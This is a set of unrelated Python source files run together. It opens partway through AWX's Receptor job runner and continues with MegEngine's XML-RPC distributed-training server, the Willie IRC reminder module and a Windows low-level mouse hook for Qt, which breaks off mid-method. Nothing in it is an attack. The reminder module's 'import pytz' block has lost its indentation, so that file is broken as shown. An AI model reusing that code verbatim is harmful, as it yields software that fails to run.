        for sub_obj_setup in sub_obj_list:
            sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
            if sub_model is None:
                continue
            try:
                sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
            except ObjectDoesNotExist:
                # Sub-object deleted since staging; skip it.
                continue
            copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
        # Point copied objects' preserved FK/M2M fields at their copied peers.
        _reconstruct_relationships(copy_mapping)
        if permission_check_func:
            permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
            permission_check_func(creater, copy_mapping.values())
    if isinstance(new_obj, Inventory):
        # Recompute inventory stats after the suppression above.
        update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
    """Thread that captures any exception raised by its target.

    After the thread finishes, ``self.exc`` is either None (clean run) or
    the ``sys.exc_info()`` triple from the failed target, allowing the
    spawning thread to re-raise it with the original traceback.
    """

    def run(self):
        self.exc = None
        try:
            threading.Thread.run(self)
        except Exception:
            self.exc = sys.exc_info()
class AWXReceptorJob:
    """Submit an ansible-runner payload to Receptor and process its results.

    Bridges a BaseTask ``task`` to a Receptor work unit: streams the runner
    payload in via a socketpair, waits on the results, and mirrors events
    back through the task's handlers. Container-group tasks are launched as
    Kubernetes pods; otherwise work runs locally or on an execution node.
    """

    def __init__(self, task, runner_params=None):
        # task: the BaseTask subclass driving this job; may be None in tests.
        # runner_params: kwargs eventually passed to ansible_runner.interface.run.
        self.task = task
        self.runner_params = runner_params
        self.unit_id = None

        if self.task and not self.task.instance.is_container_group_task:
            execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
            self.runner_params.update(execution_environment_params)

    def run(self):
        """Run the work unit to completion, always releasing it afterwards."""
        # We establish a connection to the Receptor socket
        receptor_ctl = get_receptor_ctl()

        res = None
        try:
            res = self._run_internal(receptor_ctl)
            return res
        finally:
            # Make sure to always release the work unit if we established it
            if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
                receptor_ctl.simple_command(f"work release {self.unit_id}")
            # If an error occured without the job itself failing, it could be a broken instance
            if self.work_type == 'ansible-runner' and ((res is None) or (getattr(res, 'rc', None) is None)):
                execution_node_health_check(self.task.instance.execution_node)

    def _run_internal(self, receptor_ctl):
        """Submit work, stream the payload, and wait for processing or cancel."""
        # Create a socketpair. Where the left side will be used for writing our payload
        # (private data dir, kwargs). The right side will be passed to Receptor for
        # reading.
        sockin, sockout = socket.socketpair()

        transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
        transmitter_thread.start()

        # submit our work, passing
        # in the right side of our socketpair for reading.
        _kw = {}
        if self.work_type == 'ansible-runner':
            _kw['node'] = self.task.instance.execution_node
            use_stream_tls = get_conn_type(_kw['node'], receptor_ctl).name == "STREAMTLS"
            _kw['tlsclient'] = get_tls_client(use_stream_tls)

        result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params, **_kw)
        self.unit_id = result['unitid']
        # Persist the unit id so an external cancel can find the work unit.
        self.task.update_model(self.task.instance.pk, work_unit_id=result['unitid'])

        sockin.close()
        sockout.close()

        # NOTE(review): `exc` is read *before* join() -- if the transmitter
        # thread has not finished yet, a late exception would be missed here;
        # confirm whether the check should follow the join.
        if transmitter_thread.exc:
            raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
        transmitter_thread.join()

        resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
        # Both "processor" and "cancel_watcher" are spawned in separate threads.
        # We wait for the first one to return. If cancel_watcher returns first,
        # we yank the socket out from underneath the processor, which will cause it
        # to exit. A reference to the processor_future is passed into the cancel_watcher_future,
        # Which exits if the job has finished normally. The context manager ensures we do not
        # leave any threads laying around.
        with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
            processor_future = executor.submit(self.processor, resultfile)
            cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
            futures = [processor_future, cancel_watcher_future]
            first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)

            res = list(first_future.done)[0].result()
            if res.status == 'canceled':
                receptor_ctl.simple_command(f"work cancel {self.unit_id}")
                # Closing the socket forces the processor thread to exit.
                resultsock.shutdown(socket.SHUT_RDWR)
                resultfile.close()
            elif res.status == 'error':
                unit_status = receptor_ctl.simple_command(f'work status {self.unit_id}')
                detail = unit_status['Detail']
                state_name = unit_status['StateName']

                if 'exceeded quota' in detail:
                    # NOTE(review): logger.warn is deprecated in favor of logger.warning.
                    logger.warn(detail)
                    log_name = self.task.instance.log_format
                    logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
                    # Requeue: the task manager will retry once quota frees up.
                    self.task.update_model(self.task.instance.pk, status='pending')
                    return

                # If ansible-runner ran, but an error occured at runtime, the traceback information
                # is saved via the status_handler passed in to the processor.
                if state_name == 'Succeeded':
                    return res

                if not self.task.instance.result_traceback:
                    try:
                        # Pull whatever output Receptor captured as the traceback.
                        resultsock = receptor_ctl.get_work_results(self.unit_id, return_sockfile=True)
                        lines = resultsock.readlines()
                        self.task.instance.result_traceback = b"".join(lines).decode()
                        self.task.instance.save(update_fields=['result_traceback'])
                    except Exception:
                        raise RuntimeError(detail)

        return res

    # Spawned in a thread so Receptor can start reading before we finish writing, we
    # write our payload to the left side of our socketpair.
    @cleanup_new_process
    def transmit(self, _socket):
        # On hybrid (local) nodes the private data dir is shared, so only the
        # kwargs need to cross the socket.
        if not settings.IS_K8S and self.work_type == 'local' and 'only_transmit_kwargs' not in self.runner_params:
            self.runner_params['only_transmit_kwargs'] = True

        try:
            ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
        finally:
            # Socket must be shutdown here, or the reader will hang forever.
            _socket.shutdown(socket.SHUT_WR)

    @cleanup_new_process
    def processor(self, resultfile):
        # Consume the result stream, replaying events through the task's handlers.
        return ansible_runner.interface.run(
            streamer='process',
            quiet=True,
            _input=resultfile,
            event_handler=self.task.event_handler,
            finished_callback=self.task.finished_callback,
            status_handler=self.task.status_handler,
            **self.runner_params,
        )

    @property
    def receptor_params(self):
        """Receptor work submission parameters, varying by destination."""
        if self.task.instance.is_container_group_task:
            spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)

            receptor_params = {
                "secret_kube_pod": spec_yaml,
                "pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
            }

            if self.credential:
                kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
                receptor_params["secret_kube_config"] = kubeconfig_yaml
        else:
            private_data_dir = self.runner_params['private_data_dir']
            if self.work_type == 'ansible-runner':
                # on execution nodes, we rely on the private data dir being deleted
                cli_params = f"--private-data-dir={private_data_dir} --delete"
            else:
                # on hybrid nodes, we rely on the private data dir NOT being deleted
                cli_params = f"--private-data-dir={private_data_dir}"
            receptor_params = {"params": cli_params}

        return receptor_params

    @property
    def work_type(self):
        """Receptor work type: kubernetes-*, 'local', or 'ansible-runner'."""
        if self.task.instance.is_container_group_task:
            if self.credential:
                return 'kubernetes-runtime-auth'
            return 'kubernetes-incluster-auth'
        if self.task.instance.execution_node == settings.CLUSTER_HOST_ID or self.task.instance.execution_node == self.task.instance.controller_node:
            return 'local'
        return 'ansible-runner'

    @cleanup_new_process
    def cancel_watcher(self, processor_future):
        """Poll once a second for either processor completion or a cancel request."""
        while True:
            if processor_future.done():
                return processor_future.result()

            if self.task.cancel_callback():
                result = namedtuple('result', ['status', 'rc'])
                return result('canceled', 1)

            time.sleep(1)

    @property
    def pod_definition(self):
        """Kubernetes pod spec for container-group jobs.

        Starts from the default spec, layers any instance-group pod_spec
        override on top, then forces the EE image, runner command, pull
        policy, pull secret, and AWX-identifying metadata.
        """
        ee = self.task.instance.execution_environment

        default_pod_spec = get_default_pod_spec()

        pod_spec_override = {}
        if self.task and self.task.instance.instance_group.pod_spec_override:
            pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
        # NOTE(review): shallow merge -- an override supplying 'spec' replaces
        # the whole default 'spec' subtree before the forced fields below are
        # re-applied; confirm that is the intended precedence.
        pod_spec = {**default_pod_spec, **pod_spec_override}

        pod_spec['spec']['containers'][0]['image'] = ee.image
        pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']

        # Enforce EE Pull Policy
        pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
        if self.task and self.task.instance.execution_environment:
            if self.task.instance.execution_environment.pull:
                pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]

        if self.task and self.task.instance.is_container_group_task:
            # If EE credential is passed, create an imagePullSecret
            if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
                # Create pull secret in k8s cluster based on ee cred
                from awx.main.scheduler.kubernetes import PodManager  # prevent circular import

                pm = PodManager(self.task.instance)
                secret_name = pm.create_secret(job=self.task.instance)

                # Inject secret name into podspec
                pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]

        if self.task:
            pod_spec['metadata'] = deepmerge(
                pod_spec.get('metadata', {}),
                dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
            )

        return pod_spec

    @property
    def pod_name(self):
        # Stable, per-job pod name so duplicates cannot be launched.
        return f"automation-job-{self.task.instance.id}"

    @property
    def credential(self):
        # Credential attached to the container group (None for in-cluster auth).
        return self.task.instance.instance_group.credential

    @property
    def namespace(self):
        return self.pod_definition['metadata']['namespace']

    @property
    def kube_config(self):
        """Build an in-memory kubeconfig dict from the container-group credential."""
        host_input = self.credential.get_input('host')
        config = {
            "apiVersion": "v1",
            "kind": "Config",
            "preferences": {},
            "clusters": [{"name": host_input, "cluster": {"server": host_input}}],
            "users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
            "contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
            "current-context": host_input,
        }

        if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
            config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
                self.credential.get_input('ssl_ca_cert').encode()  # encode to bytes
            ).decode()  # decode the base64 data into a str
        else:
            config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
        return config
|
server.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import threading
import time
from collections import defaultdict
from functools import partial
from socketserver import ThreadingMixIn
from xmlrpc.client import ServerProxy
from xmlrpc.server import SimpleXMLRPCServer
from ..core._imperative_rt.utils import create_mm_server
from ..utils.future import Future
class Methods:
    r"""Distributed Server Method.

    Used for exchange information between distributed nodes. Exposed over
    XML-RPC; every method must therefore return an XML-RPC-serializable value.

    Args:
        mm_server_port: multiple machine rpc server port.
    """

    def __init__(self, mm_server_port):
        # Single lock guarding all the dictionaries below. Futures themselves
        # block outside the lock, so waiting never holds it.
        self.lock = threading.Lock()
        self.mm_server_port = mm_server_port
        # Future(True) allows the value to be set more than once; Future(False) does not.
        self.dict_is_grad = defaultdict(partial(Future, True))
        self.dict_remote_tracer = defaultdict(partial(Future, True))
        self.dict_pack_list = defaultdict(partial(Future, False))
        self.dict_barrier_counter = defaultdict(int)
        self.dict_barrier_event = defaultdict(threading.Event)
        self.user_dict = defaultdict(partial(Future, False))
        self.bcast_dict = {}

    def connect(self):
        r"""Method for checking connection success."""
        return True

    def get_mm_server_port(self):
        r"""Get multiple machine rpc server port."""
        return self.mm_server_port

    def set_is_grad(self, key, is_grad):
        r"""Mark whether a send/recv pair needs gradients, by key.

        Args:
            key: key to match send/recv op.
            is_grad: whether this op need grad.
        """
        with self.lock:
            future = self.dict_is_grad[key]
        future.set(is_grad)
        return True

    def check_is_grad(self, key):
        r"""Check whether send/recv need gradients.

        Blocks until the peer has called :meth:`set_is_grad` for ``key``.

        Args:
            key: key to match send/recv op.
        """
        with self.lock:
            future = self.dict_is_grad[key]
        # get() blocks outside the lock so the setter can make progress.
        ret = future.get()
        with self.lock:
            del self.dict_is_grad[key]
        return ret

    def set_remote_tracer(self, key, tracer_set):
        r"""Set tracer dict for tracing send/recv op.

        Args:
            key: key to match send/recv op.
            tracer_set: valid tracer set.
        """
        with self.lock:
            future = self.dict_remote_tracer[key]
        future.set(tracer_set)
        return True

    def check_remote_tracer(self, key):
        r"""Get tracer dict for send/recv op.

        Blocks until the peer has called :meth:`set_remote_tracer` for ``key``.

        Args:
            key: key to match send/recv op.
        """
        with self.lock:
            future = self.dict_remote_tracer[key]
        ret = future.get()
        with self.lock:
            del self.dict_remote_tracer[key]
        return ret

    def group_barrier(self, key, size):
        r"""A barrier wait for all group member.

        The last arrival cleans up the per-key state and wakes everyone; the
        others block on the shared event (outside the lock).

        Args:
            key: group key to match each other.
            size: group size.
        """
        with self.lock:
            self.dict_barrier_counter[key] += 1
            counter = self.dict_barrier_counter[key]
            event = self.dict_barrier_event[key]
        if counter == size:
            del self.dict_barrier_counter[key]
            del self.dict_barrier_event[key]
            event.set()
        else:
            event.wait()
        return True

    def user_set(self, key, val):
        r"""Set user defined key-value pairs across processes."""
        with self.lock:
            future = self.user_dict[key]
        future.set(val)
        return True

    def user_get(self, key):
        r"""Get user defined key-value pairs across processes (blocking)."""
        with self.lock:
            future = self.user_dict[key]
        return future.get()

    def bcast_val(self, val, key, size):
        # Broadcast: the one caller passing a non-None val sets the shared
        # Future; the other size-1 callers block reading it. The last caller
        # to decrement the counter removes the entry.
        with self.lock:
            if key not in self.bcast_dict:
                self.bcast_dict[key] = [Future(False), size]
            arr = self.bcast_dict[key]
        if val is not None:
            arr[0].set(val)
            val = None
        else:
            val = arr[0].get()
        with self.lock:
            cnt = arr[1] - 1
            arr[1] = cnt
            if cnt == 0:
                del self.bcast_dict[key]
        return val

    def _del(self, key):
        # Internal helper: remove a user_dict entry under the lock.
        with self.lock:
            del self.user_dict[key]

    # thread safe function
    def user_pop(self, key):
        r"""Get and remove a user defined key-value pair (blocking get, then delete)."""
        ret = self.user_get(key)
        self._del(key)
        return ret
class ThreadXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
    """XML-RPC server that serves each request in its own thread,
    allowing blocking calls (e.g. barriers, future gets) to overlap."""

    pass
def _start_server(py_server_port, queue):
    r"""Start python distributed server and multiple machine server.

    The multiple-machine server port is allocated internally (OS-assigned)
    rather than passed in.

    Args:
        py_server_port: python server port; 0 lets the OS pick a free port.
        queue: the bound ``(py_server_port, mm_server_port)`` pair is put in
            this queue on success; the exception object is put instead when
            the process fails to start.
    """
    try:
        mm_server_port = create_mm_server("0.0.0.0", 0)
        # allow_none=True: some Methods calls marshal None over XML-RPC.
        server = ThreadXMLRPCServer(
            ("0.0.0.0", py_server_port), logRequests=False, allow_none=True
        )
        server.register_instance(Methods(mm_server_port))
        # Re-read the port in case 0 was requested and the OS assigned one.
        _, py_server_port = server.server_address
        queue.put((py_server_port, mm_server_port))
        server.serve_forever()
    except Exception as e:
        queue.put(e)
class Server:
    r"""Distributed Server for distributed training.

    Should be running at master node.

    The actual server runs in a daemon child process; the constructor blocks
    until the child reports the bound ports (or raises the child's startup
    exception in the parent).

    Args:
        port: python server port; 0 lets the OS pick a free port.
    """

    def __init__(self, port=0):
        q = mp.Queue()
        self.proc = mp.Process(target=_start_server, args=(port, q), daemon=True)
        self.proc.start()
        # Handshake: _start_server puts either (py_port, mm_port) or an Exception.
        ret = q.get()
        if isinstance(ret, Exception):
            raise ret
        else:
            self.py_server_port, self.mm_server_port = ret

    def __del__(self):
        # Best-effort shutdown of the child server process.
        self.proc.terminate()
class Client:
    r"""Distributed Client for distributed training.

    Thin XML-RPC proxy around the master node's :class:`Server`; each method
    mirrors the corresponding :class:`Methods` handler.

    Args:
        master_ip: ip address of master node.
        port: port of server at master node.
    """

    def __init__(self, master_ip, port):
        self.master_ip = master_ip
        self.port = port
        self.connect()
        # Per-key call counter used to derive a fresh server-side key for
        # every broadcast round (see bcast_val).
        self.bcast_dict = defaultdict(lambda: 0)

    def connect(self):
        r"""Check connection success."""
        # NOTE(review): retries forever and the bare except swallows every
        # error (not just connection refusal) — confirm this is intended.
        while True:
            try:
                self.proxy = ServerProxy(
                    "http://{}:{}".format(self.master_ip, self.port), allow_none=True
                )
                if self.proxy.connect():
                    break
            except:
                time.sleep(1)

    def get_mm_server_port(self):
        r"""Get multiple machine server port."""
        return self.proxy.get_mm_server_port()

    def set_is_grad(self, key, is_grad):
        r"""Mark send/recv need gradiants by key.

        Args:
            key: key to match send/recv op.
            is_grad: whether this op need grad.
        """
        self.proxy.set_is_grad(key, is_grad)

    def check_is_grad(self, key):
        r"""Check whether send/recv need gradiants.

        Blocks on the server until the matching set arrives.

        Args:
            key: key to match send/recv op.
        """
        return self.proxy.check_is_grad(key)

    def set_remote_tracer(self, key, tracer_set):
        r"""Set tracer dict for tracing send/recv op.

        Args:
            key: key to match send/recv op.
            tracer_set: valid tracer set.
        """
        self.proxy.set_remote_tracer(key, tracer_set)

    def check_remote_tracer(self, key):
        r"""Get tracer dict for send/recv op.

        Args:
            key: key to match send/recv op.
        """
        return self.proxy.check_remote_tracer(key)

    def group_barrier(self, key, size):
        r"""A barrier wait for all group member.

        Args:
            key: group key to match each other.
            size: group size.
        """
        self.proxy.group_barrier(key, size)

    def user_set(self, key, val):
        r"""Set user defined key-value pairs across processes."""
        return self.proxy.user_set(key, val)

    def user_get(self, key):
        r"""Get user defined key-value pairs across processes."""
        return self.proxy.user_get(key)

    def user_pop(self, key):
        r"""Get user defined key-value pairs and delete the resources when the get is done"""
        return self.proxy.user_pop(key)

    def bcast_val(self, val, key, size):
        r"""Broadcast ``val`` among ``size`` participants sharing ``key``.

        The sender passes a non-``None`` value; receivers pass ``None`` and
        get the broadcast value back.
        """
        # Suffix the key with a per-client round counter so repeated
        # broadcasts under the same logical key never collide server-side.
        idx = self.bcast_dict[key] + 1
        self.bcast_dict[key] = idx
        key = key + "_bcast_" + str(idx)
        return self.proxy.bcast_val(val, key, size)
def main(port=0, verbose=True):
    """Run the distributed server in the foreground (blocking).

    Starts the multiple-machine server on an OS-assigned port, then serves
    the XML-RPC ``Methods`` instance until interrupted.

    Args:
        port: python XML-RPC server port; 0 lets the OS pick a free port.
        verbose: whether to log each handled XML-RPC request.
    """
    mm_server_port = create_mm_server("0.0.0.0", 0)
    # Bug fix: allow_none=True was missing here (but present in
    # _start_server). Without it, any Methods call that marshals None —
    # e.g. bcast_val returning None to the broadcasting process — raises a
    # TypeError in xmlrpc marshalling.
    server = ThreadXMLRPCServer(
        ("0.0.0.0", port), logRequests=verbose, allow_none=True
    )
    server.register_instance(Methods(mm_server_port))
    _, port = server.server_address
    print("serving on port", port)
    server.serve_forever()
if __name__ == "__main__":
    import argparse

    def _str2bool(value):
        """Parse a boolean-ish CLI string.

        argparse's ``type=bool`` is a trap: ``bool("False")`` is True, so any
        non-empty argument (including "False"/"0") enabled verbose mode.
        """
        return value.strip().lower() in ("1", "true", "yes", "y", "on")

    ap = argparse.ArgumentParser()
    ap.add_argument("-p", "--port", type=int, default=0)
    ap.add_argument("-v", "--verbose", type=_str2bool, default=True)
    args = ap.parse_args()
    main(port=args.port, verbose=args.verbose)
|
remind.py | """
remind.py - Willie Reminder Module
Copyright 2011, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://willie.dftba.net
"""
import os
import re
import time
import threading
import collections
import codecs
from datetime import datetime
from willie.module import commands, example, NOLIMIT
import willie.tools
try:
import pytz
except:
pytz = None
def filename(self):
    """Return the per-bot, per-network path of the reminder database."""
    db_name = '{}-{}.reminders.db'.format(self.nick, self.config.host)
    return os.path.join(self.config.dotdir, db_name)
def load_database(name):
    """Load reminders from the tab-separated database file.

    Each line holds ``unixtime<TAB>channel<TAB>nick<TAB>message``.

    Args:
        name: path of the reminder database file.

    Returns:
        dict mapping int unix timestamp -> list of (channel, nick, message)
        tuples; empty dict when the file does not exist.
    """
    data = {}
    if os.path.isfile(name):
        # Fix: the file handle previously leaked if a malformed line raised
        # before the explicit close(); ``with`` closes it unconditionally.
        with codecs.open(name, 'r', encoding='utf-8') as f:
            for line in f:
                unixtime, channel, nick, message = line.split('\t')
                message = message.rstrip('\n')
                # Timestamps may have been stored with a fractional part;
                # truncate to int so they match int(time.time()) comparisons.
                t = int(float(unixtime))
                reminder = (channel, nick, message)
                data.setdefault(t, []).append(reminder)
    return data
def dump_database(name, data):
    """Write the whole reminder dict back to disk, one reminder per line.

    Args:
        name: path of the reminder database file (overwritten).
        data: dict mapping unix timestamp -> list of (channel, nick, message).
    """
    # Fix: use a context manager so the handle is closed even if a write
    # raises (the explicit close() was skipped on error).
    with codecs.open(name, 'w', encoding='utf-8') as f:
        for unixtime, reminders in willie.tools.iteritems(data):
            for channel, nick, message in reminders:
                f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
def setup(bot):
    """Load the reminder database and start the background delivery thread.

    Attaches ``bot.rfn`` (database path) and ``bot.rdb`` (in-memory reminder
    dict), then spawns a thread that polls for due reminders.
    """
    bot.rfn = filename(bot)
    bot.rdb = load_database(bot.rfn)

    def monitor(bot):
        # Initial delay before the first poll (presumably to let the bot
        # finish connecting — TODO confirm).
        time.sleep(5)
        while True:
            now = int(time.time())
            unixtimes = [int(key) for key in bot.rdb]
            oldtimes = [t for t in unixtimes if t <= now]
            if oldtimes:
                for oldtime in oldtimes:
                    for (channel, nick, message) in bot.rdb[oldtime]:
                        # Empty message -> just ping the nick.
                        if message:
                            bot.msg(channel, nick + ': ' + message)
                        else:
                            bot.msg(channel, nick + '!')
                    del bot.rdb[oldtime]
                # Persist after each delivery batch so delivered reminders
                # are not re-sent after a restart.
                dump_database(bot.rfn, bot.rdb)
            time.sleep(2.5)

    targs = (bot,)
    t = threading.Thread(target=monitor, args=targs)
    t.start()
# Unit aliases and their length in seconds, grouped per unit.  Order matters:
# ``scaling`` preserves it, and ``periods`` (used in the .in regex) tries
# longer alias spellings first within each group.
_DURATIONS = (
    (('years', 'year', 'yrs', 'y'), 365.25 * 24 * 3600),
    (('months', 'month', 'mo'), 29.53059 * 24 * 3600),
    (('weeks', 'week', 'wks', 'wk', 'w'), 7 * 24 * 3600),
    (('days', 'day', 'd'), 24 * 3600),
    (('hours', 'hour', 'hrs', 'hr', 'h'), 3600),
    (('minutes', 'minute', 'mins', 'min', 'm'), 60),
    (('seconds', 'second', 'secs', 'sec', 's'), 1),
)

scaling = collections.OrderedDict(
    (alias, seconds)
    for aliases, seconds in _DURATIONS
    for alias in aliases
)

periods = '|'.join(scaling.keys())
@commands('in')
@example('.in 3h45m Go to class')
def remind(bot, trigger):
    """Gives you a reminder in the given amount of time.

    Parses leading ``<number><unit>`` chunks (e.g. ``3h45m``) into a duration
    in seconds; everything after the first non-duration piece is the message.
    """
    duration = 0
    # Fix: regex literals are now raw strings — '\d' in a plain string is an
    # invalid escape sequence (SyntaxWarning, and an error in future Python).
    message = re.split(r'(\d+(?:\.\d+)? ?(?:' + periods + r')) ?',
                       trigger.group(2))[1:]
    reminder = ''
    stop = False
    for piece in message:
        grp = re.match(r'(\d+(?:\.\d+)?) ?(.*) ?', piece)
        if grp and not stop:
            length = float(grp.group(1))
            # Unrecognized unit strings fall back to minutes.
            factor = scaling.get(grp.group(2), 60)
            duration += length * factor
        else:
            # First non-duration piece starts the reminder text; everything
            # afterwards is appended verbatim.
            reminder = reminder + piece
            stop = True
    if duration == 0:
        return bot.reply("Sorry, didn't understand the input.")
    # Round fractional durations up to the next whole second.
    if duration % 1:
        duration = int(duration) + 1
    else:
        duration = int(duration)
    timezone = willie.tools.get_timezone(
        bot.db, bot.config, None, trigger.nick, trigger.sender)
    create_reminder(bot, trigger, duration, reminder, timezone)
@commands('at')
@example('.at 13:47 Do your homework!')
def at(bot, trigger):
    """
    Gives you a reminder at the given time. Takes hh:mm:ssTimezone
    message. Timezone is any timezone Willie takes elsewhere; the best choices
    are those from the tzdb; a list of valid options is available at
    http://dft.ba/-tz . The seconds and timezone are optional.
    """
    regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
    match = regex.match(trigger.group(2))
    if not match:
        bot.reply("Sorry, but I didn't understand your input.")
        return NOLIMIT
    hour, minute, second, tz, message = match.groups()
    if not second:
        second = '0'
    if pytz:
        timezone = willie.tools.get_timezone(bot.db, bot.config, tz,
                                             trigger.nick, trigger.sender)
        now = datetime.now(pytz.timezone(timezone))
        at_time = datetime(now.year, now.month, now.day,
                           int(hour), int(minute), int(second),
                           tzinfo=now.tzinfo)
        timediff = at_time - now
    else:
        if tz and tz.upper() != 'UTC':
            # Fix: user-facing typo ("timzeone" -> "timezone").
            bot.reply("I don't have timezone support installed.")
            return NOLIMIT
        now = datetime.now()
        at_time = datetime(now.year, now.month, now.day,
                           int(hour), int(minute), int(second))
        timediff = at_time - now
    # timedelta.seconds is always in [0, 86400), so a clock time earlier than
    # now already wraps to the same time tomorrow; the < 0 guard below is
    # defensive and never fires.
    duration = timediff.seconds
    if duration < 0:
        duration += 86400
    create_reminder(bot, trigger, duration, message, 'UTC')
def create_reminder(bot, trigger, duration, message, tz):
    """Store a reminder due in ``duration`` seconds and confirm to the user."""
    due = int(time.time()) + duration
    entry = (trigger.sender, trigger.nick, message)
    if due in bot.rdb:
        bot.rdb[due].append(entry)
    else:
        bot.rdb[due] = [entry]
    dump_database(bot.rfn, bot.rdb)
    if duration >= 60:
        # Long reminders: confirm with the absolute (timezone-formatted) time.
        remind_at = datetime.utcfromtimestamp(due)
        timef = willie.tools.format_time(bot.db, bot.config, tz, trigger.nick,
                                         trigger.sender, remind_at)
        bot.reply('Okay, will remind at %s' % timef)
    else:
        bot.reply('Okay, will remind in %s secs' % duration)
|
hooks.py |
# Based on:
# https://stackoverflow.com/a/31396340
from ctypes import *
from ctypes.wintypes import *
# use_last_error=True lets errcheck_bool read the real Win32 error code.
user32 = WinDLL('user32', use_last_error=True)

# Hook codes and window-message ids from WinUser.h.
HC_ACTION = 0
WH_MOUSE_LL = 14  # low-level mouse hook
WM_QUIT = 0x0012
WM_MOUSEMOVE = 0x0200
WM_LBUTTONDOWN = 0x0201
WM_LBUTTONUP = 0x0202
WM_RBUTTONDOWN = 0x0204
WM_RBUTTONUP = 0x0205
WM_MBUTTONDOWN = 0x0207
WM_MBUTTONUP = 0x0208
WM_MOUSEWHEEL = 0x020A
WM_MOUSEHWHEEL = 0x020E

# Human-readable names for printing/debugging hook messages.
MSG_TEXT = {WM_MOUSEMOVE: 'WM_MOUSEMOVE',
            WM_LBUTTONDOWN: 'WM_LBUTTONDOWN',
            WM_LBUTTONUP: 'WM_LBUTTONUP',
            WM_RBUTTONDOWN: 'WM_RBUTTONDOWN',
            WM_RBUTTONUP: 'WM_RBUTTONUP',
            WM_MBUTTONDOWN: 'WM_MBUTTONDOWN',
            WM_MBUTTONUP: 'WM_MBUTTONUP',
            WM_MOUSEWHEEL: 'WM_MOUSEWHEEL',
            WM_MOUSEHWHEEL: 'WM_MOUSEHWHEEL'}

# ctypes.wintypes lacks these aliases; both are pointer-sized integers.
ULONG_PTR = WPARAM
LRESULT = LPARAM
LPMSG = POINTER(MSG)

# Callback prototype shared by low-level hook procedures.
HOOKPROC = WINFUNCTYPE(LRESULT, c_int, WPARAM, LPARAM)
LowLevelMouseProc = HOOKPROC
class MSLLHOOKSTRUCT(Structure):
    """ctypes mirror of the Win32 MSLLHOOKSTRUCT passed to WH_MOUSE_LL hooks."""

    _fields_ = (('pt', POINT),
                ('mouseData', DWORD),
                ('flags', DWORD),
                ('time', DWORD),
                ('dwExtraInfo', ULONG_PTR))

LPMSLLHOOKSTRUCT = POINTER(MSLLHOOKSTRUCT)
def errcheck_bool(result, func, args):
    """ctypes errcheck hook: raise WinError when the API returned 0/NULL."""
    if result:
        return args
    raise WinError(get_last_error())
# Declare argument/return types so ctypes validates calls and converts
# results correctly; errcheck_bool turns a NULL hook handle into WinError.
user32.SetWindowsHookExW.errcheck = errcheck_bool
user32.SetWindowsHookExW.restype = HHOOK
user32.SetWindowsHookExW.argtypes = (c_int,     # _In_ idHook
                                     HOOKPROC,  # _In_ lpfn
                                     HINSTANCE, # _In_ hMod
                                     DWORD)     # _In_ dwThreadId

user32.CallNextHookEx.restype = LRESULT
user32.CallNextHookEx.argtypes = (HHOOK,  # _In_opt_ hhk
                                  c_int,  # _In_     nCode
                                  WPARAM, # _In_     wParam
                                  LPARAM) # _In_     lParam

user32.GetMessageW.argtypes = (LPMSG, # _Out_    lpMsg
                               HWND,  # _In_opt_ hWnd
                               UINT,  # _In_     wMsgFilterMin
                               UINT)  # _In_     wMsgFilterMax

user32.TranslateMessage.argtypes = (LPMSG,)
user32.DispatchMessageW.argtypes = (LPMSG,)
from PySide2.QtCore import Signal, QObject
class _MouseSignaler(QObject):
    """QObject that exposes left-mouse-button hook events as Qt signals.

    ``left_is_down`` tracks the most recent signal received, i.e. it is True
    between the last emitted ``left_down`` and the next ``left_up``.
    """

    left_up = Signal()
    left_down = Signal()

    def __init__(self):
        super().__init__()
        # Track button state by listening to our own signals.
        self.left_down.connect(self._left_down_slot)
        self.left_up.connect(self._left_up_slot)
        self._left_is_down = False

    def _left_up_slot(self):
